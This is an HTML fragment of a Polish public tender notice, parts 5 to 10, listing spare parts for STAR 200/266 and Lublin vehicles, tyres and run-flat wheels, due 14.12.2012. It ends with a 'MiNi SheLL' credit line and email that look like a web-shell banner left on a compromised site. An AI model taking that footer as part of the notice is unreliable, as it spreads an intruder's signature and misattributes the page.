<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa części zamiennych do pojazdu marki STAR 200/266.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa niżej wymienionego asortymentu części zamiennych do pojazdu marki STAR 200/266:
1. ZDERZAK GUMOWY - szt. 4
2. WIESZAK RESORU - szt. 10
3. AMORTYZATOR AMSTRONG - szt.	8
4. RESOR TYLNY KPL. - szt. 8
5. DRĄŻEK REAKCYJNY ZE SWORZNIAMI - szt. 60
6. WAŁ NAPĘDOWY: SKRZYNIA BIEGÓW - SKRZYNIA ROZDZIELCZA	- szt. 2
7. WAŁ NAPĘDOWY: MOST PRZEDNI - SKRZYNIA ROZDZIELCZA - szt. 2
8. WAŁ NAPĘDOWY: SKRZYNKA ROZDZIELCZA - ŚRODKOWY MOST - szt. 2
9. WAŁ NAPĘDOWY: SKRZYNKA ROZDZIELCZA - ŁOŻYSKO POŚREDNIE - szt. 2
10. WAŁ NAPĘDOWY: ŁOŻYSKO POŚREDNIE - TYLNY MOST - szt. 2
11. KRZYŻAK Z ŁOŻYSKAMI - szt. 4
12. KRZYŻAK Z ŁOŻYSKAMI - szt. 4
13. SPRZĘGŁO KOMPLETNE - kpl. 2
14. PRZEGUB KULOWY - szt. 2
15. PRZEGUB - szt. 2
16. POMPA SPRZĘGŁA - szt. 4
17. WAŁ NAPĘDOWY: SKRZYNIA ROZDZIELCZA - TYLNY MOST - szt. 2
18. SPRĘŻARKA KPL. - szt. 6
19. POMPA WSPOMAGANIA /ZF/ - szt.	8
20. POMPA WSPOMAGANIA /ŁOPATKOWA/ - szt. 6
21. POMPA WSPOMAGANIA UKŁĄDU KIEROWNICZEGO TYPU ZIŁ - szt. 6
22. DWUOBWODOWA POMPA HAMULCÓW HYDRAULICZNYCH KPL. -szt. 10
23. TARCZA HAMULCA RĘCZNEGO S 266 - szt. 10
24. ZWROTNICA LEWA - szt.	9
25. ZWROTNICA PRAWA - szt. 9
26. BĘBEN HAMULCA - szt. 10
27. SZCZĘKA HAMULCOWA WSPÓŁBIEŻNA - szt. 10
28. SZCZĘKA HAMULCOWA PRZECIWBIEŻNA - szt. 10
29. CYLINDER HAMULCOWY KPL. - szt. 40
30. CYLINDER HAMULCA - szt. 40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 34.35.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa części zamiennych do pojazdu marki STAR 200/266.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa niżej wymienionego asortymentu części zamiennych do pojazdu marki STAR 200/266:
1. SIŁOWNIK HAMULCOWY SPRĘŻYNOWY S200 - szt. 4
2. AUTOMATYCZNY REGULATOR SIŁY HAMOWANIA -szt. 6
3. AUTOMAT. REGULATOR SIŁY HAM. S244 - szt. 2
4. DWUOBWODOWY MECHANIZM WSPOMAGAJĄCY KPL. - szt. 2
5. DWUOBWODOWY ZAWÓR ZABEZPIECZAJĄCY	- szt. 4
6. DWUOBWODOWY ZAWÓR ZABEZPIECZAJĄCY - szt. 4
7. ZAWÓR HAMOWANIA PRZYCZEPY KPL. - szt.	6
8. ZAWÓR HAMOWANIA PRZYCZEPY KPL. - szt. 4
9. DWUOBWODOWY ZAWÓR PRZEKAŹN.-STERUJĄCY - szt. 2
10. REGULATOR CIŚNIENIA KPL. -szt. 2
11. REGULATOR CIŚNIENIA KPL. -szt. 4
12. RĘCZNY ZAWÓR HAMULCOWY -szt. 2
13. ZAWÓR PRZEKAŹNIKOWY - szt. 6
14. ZAWÓR 3/2 - DROŻNY - szt. 8
15.ZAWÓR PRZEPŁYWOWY HZP-2.1 szt. 2                                                                       
16. ZAWÓR ELEKTROMAGNETYCZNY 24V - szt. 6
17. ZAWÓR ELEKTROMAGNETYCZNY /12V/ - szt. 6
18. SZCZĘKA HAMULCA POSTOJOWEGO LEWA - szt. 6
19. SZCZĘKA HAMULCA POSTOJOWEGO PRAWA - szt. 6
20. WKŁADKA CIERNA HAMULCA POSTOJOWEGO - szt. 40
21. PRZEKŁADNIA KIEROWNICZA ZE WSPOMAGANIEM   /typu ZIŁ/ -szt. 4
22. PRZEKŁADNIA KIEROWNICZA ZF -szt. 4
23. WKŁAD FILTRUJĄCY UKŁADU WSPOMAGANIA - szt. 10
24. DRĄŻEK KIEROWNICZY - szt. 2
25. PRZEWOD HAMULCOWY GIĘTKI - szt. 6
26. HAMULEC RĘCZNY KPL. - szt. 2
27. MECHANIZM NAPĘDOWY 12V - szt. 6
28. MECHANIZM NAPĘDOWY 24V - szt. 6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 34.35.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa części zamiennych do pojazdu marki STAR 200/266.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa niżej wymienionego asortymentu części zamiennych do pojazdu marki STAR 200/266: 
1. KOŁO ZAMACHOWE - szt. 2
2. ODRZUTNIK PRZEDNI WAŁU KORBOW. - szt. 2
3. TARCZA SPRZĘGŁA ALTERNATORA  ZEW. - szt. 4
4. ZAWÓR PRZEPŁYW. POMPY WTRYSK. - szt. 4
5. POMPA ZASILAJĄCA KPL. - szt. 2
6. POMPA ZASILAJĄCA - szt.  5
7. ZAWÓR PRZEPŁYWOWY POMPY WTRYSKOWEJ - szt. 6
8. FILTR PALIWA PUSZKOWY /DWUKOMOROWY/ - szt.  20
9. FILTR PALIWA PUSZKOWY	 - szt. 30
10. WKŁAD FILTRUJĄCY PALIWA - szt.	40
11. ZBIORNIK PALIWA S266 LEWY - szt. 7
12. ZBIORNIK PALIWA S266 PRAW - szt. 7
13. ZBIORNIK PALIWA S200 - szt. 3
14. ŚWIECA PŁOMIENIOWA  24V - szt. 12
15. OPORNIK ŚWIECY 24V -szt. 4
16. ROZRUSZNIK R-10C KPL.	- szt. 2
17. ROZRUSZNIK R-10CW KPL. - szt. 10
18. WIRNIK ROZRUSZNIKA - szt. 6
19. REGULATOR NAPIĘCIA 24V - szt. 14
20. POMPA WODY DO ZF - szt. 8
21. TERMOSTAT UKŁADU CHŁODZENIA - szt. 10
22. ŁĄCZNIK GUMOWY CHŁODNICY - szt. 10
23. ROLETA ZASŁONY CHŁODNICY - szt. 10
24.TŁUMIK Z KOŁNIERZEM - szt. 10
25. CIĘGŁO STEROW.POMPY WTRYSK. DŁUGIE - szt. 8
26. ZESPÓŁ PASKÓW KLINOWYCH NAPĘDU POMPY WODNEJ I ALTERNATORA 2SPA-1332- szt. 10
27. ZESPÓŁ PASKÓW KLINOWYCH ALTERN. - szt. 10
28. PASEK KLINOWY SPRĘŻARKI ZF - szt. 10
29. MECHANIZM NAPĘDOWY 24V - szt. 4
30. ŁOŻYSKO KULKOWE 17X40X12 TK - szt. 4
31. ŁOŻYSKO KULKOWE 20X52X15 - szt. 4
32. ŁOŻ. STOŻK. PIASTY ZEW.80*140*35,5 - szt. 4
33. ŁOŻ. STOŻK. PIASTY WEW.85*150*39 - szt. 4
34. ŁOŻYSKO KULKOWE - szt. 4
35. MAGNETYCZNY ZAWÓR PRZEPŁYWOWY - szt. 6
36. MAGNETYCZNY ZAWÓR PRZEPŁYWOWY - szt. 6
37. MAGNETYCZNY ZAWÓR PRZEPŁYWOWY - szt. 6
38. ZAWÓR ODWADNIAJĄCY	- szt. 6
39. ZAWÓR PALIWA - szt. 4
40. ZAWÓR PALIWA - szt. 4
41. USZCZELKA POD GŁOWICĘ - szt. 40
42. USZCZELKA KOLEKTORA WYDECHOWEGO - szt. 16
43. USZCZELKA - szt. 50
44. PODPPRA WAŁU NAPĘDOWEGO PRZEDNIA - szt. 10
45. WSPORNIK CZUJNIKA - szt. 20
46. DŹWIGNIA HAMULCA RĘCZNEGO KPL Z MECH. S 266 - szt. 5
47. TULEJKA WIESZAKA RESORU - szt. 20
48. CZUJNIK BLOKADY MOSTU - szt. 20
49. LAMPA TYLNA WODOODPORNA PRAWA - szt. 10
50. LAMPA ZESPOLONA LEWA WODOODPORNAL	- szt. 10
51. LAMPA ZESPOLONA /ZGRUPOWANA/ TYLNA LEWA 4 ELEMENTOWA - szt. 10
52. LAMPA ZESPOLONA /ZGRUPOWANA/ TYLNA PRAWA 4 ELEMENTOWA -szt.	10
53. LAMPA ŚWIATŁA COFANIA - szt. 10
54. LAMPA PRZECIWMGIELNA TYLNA - szt. 10
55. LAMPA BOCZNA KIERUNKOWSKAZU - szt. 6
56. LAMPA PRZEDNIA ZESPOLONA LEWA - szt. 8
57. LAMPA PRZEDNIA ZESPOLONA PRAWA - szt.	8
58. REFLEKTOR GŁÓWNY  - szt. 10
59. LAMPA OŚWIETLENIA SILNIKA I MAPY - szt.	10
60. LAMPA TYLNA WODOODPORNA LEWA - szt. 10
61. ŚWIECA ŻAROWA 19V - szt. 18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 34.35.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa części zamiennych do pojazdu marki LUBLIN silnik Andoria.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa niżej wymienionego asortymentu części zamiennych do pojazdu marki LUBLIN silnik Andoria:
1.AMORTYZATOR PRZÓD - szt. 4
2. AMORTYZATOR TYŁ - szt.	4
3. POMPA HAMULCOWA - szt. 2
4. SZCZĘKA HAMULCA Z REGULATOREM - szt. 8
5. KOŃCÓWKA DRĄŻKA KIER. PRAWA - szt. 8
6. LUSTERKO PRAWE - szt. 2
7. LUSTERKO LEWE - szt. 2
8. ZESTAW NAPRAWCZY ZWROTNIC - kpl 4
9. ZESTAW NAPRAWCZY SILNIKA 4C90 - kpl 2
10. FILTR PALIWA FP-5,5 - kpl. 20
11. ALTERNATOR Z KOŁEM PASOWYM	- szt. 1
12. ŚWIECA ŻAROWA BERU SR 10010022618611	 - szt. 12
13. ŚWIECA ŻAROWA M12NT ISKRA- KW 25S6 - szt. 12
14. TERMOSTAT - szt. 2
15. FILTR OLEJU PP-8.7.2 - szt. 12
16. PODUSZKA ZAWIESZENIA SILNIKA	- szt. 4
17. ŁOŻYSKO WYŁ. SPRZĘGŁO KPL. - kpl. 2
18. KOMPLET USZCZELEK SILNIKA - kpl. 2
19. WŁĄCZNIK ZAPŁONU (STACYJKA)	- szt. 6
20. WIESZAK TŁUMIKA - szt. 2
21. TULEJKA MET-GUMOWA STABILIZATORA - szt. 6
22. KOREKTOR HAMOWANIA 	- kpl 6
23. ŁĄCZNIK STABILIZATORA KPL - kpl 2
24. TULEJA STABILIZATORA - szt. 2
25. PRZEKAŹNIK ŚWIATEŁ - szt. 2
26. SIŁOWNIK POMPY WTRYSKOWEJ - szt. 2
27. SWORZEŃ RESORU TYLNEGO 3,5 T - szt. 8
28. WIESZAK RESORU - szt.	8
29. CZUJNIK TEMPERATURY WODY - szt. 2
30. WKŁAD FILTRA PALIWA WP-15 - szt. 20
31. GŁOWICA SILNIKA 4C90 - kpl. 2
32. PASEK 800 1 A - szt. 8
33. PASEK KLINOWY WSPOMAGANIA HA800 10X800 - szt.	8
34. PASEK KLINOWY ALTERNATORA - szt. 8
35. TŁUMIK WYDECHU - szt.	4
36. CZUJNIK TEPERATURY SILNIKA -szt. 4
37. KOREKTROR SIŁY HAMOWANIA- szt. 6
38. USZCZELKA DRZWI KABINY - szt. 6
39. ZDERZAK PRZEDNI - szt.	2
40. STRZEMIE RESORU PRZEDNIEGO - szt. 8
41. WTRYSKIWACZ KPL. - szt. 12
42. CYLINDER HAMULCA PRZÓD -szt. 8
43. KPL.KLOCKÓW HAMULCOWYCH  - kpl 6
44. WKŁAD FILTRA POWIETRZA WA20-250 - szt. 20
45. KOŃCÓWKA DRĄŻKA KIER. LEWA - szt. 12
46. TARCZA HAMULCA PRZEDNIEGO WENTYL - szt. 2
47. LINKA HAMULCA RĘCZNEGO - szt. 4
48. KRZYŻAK WAŁU NAPĘD. Z ŁOŻYSKAMI - szt. 18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 34.35.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa ogumienia do pojazdów kołowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa niżej wymienionego asortymentu ogumienia do pojazdów kołowych:
1.OPONA 12.00 R20 - szt. 28.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 34.35.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa specjalistycznych kół z wkładami dojazdowymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa niżej wymienionego asortymentu specjalistycznych kół z wkładami dojazdowymi:
1. SPECJALISTYCZNE KOŁA  Z  WKŁADKAMI DOJAZDOWYMI OPONA 12.00  R20 - STAR 266M DO WERSJI HIBNERYT - szt. 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 34.35.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com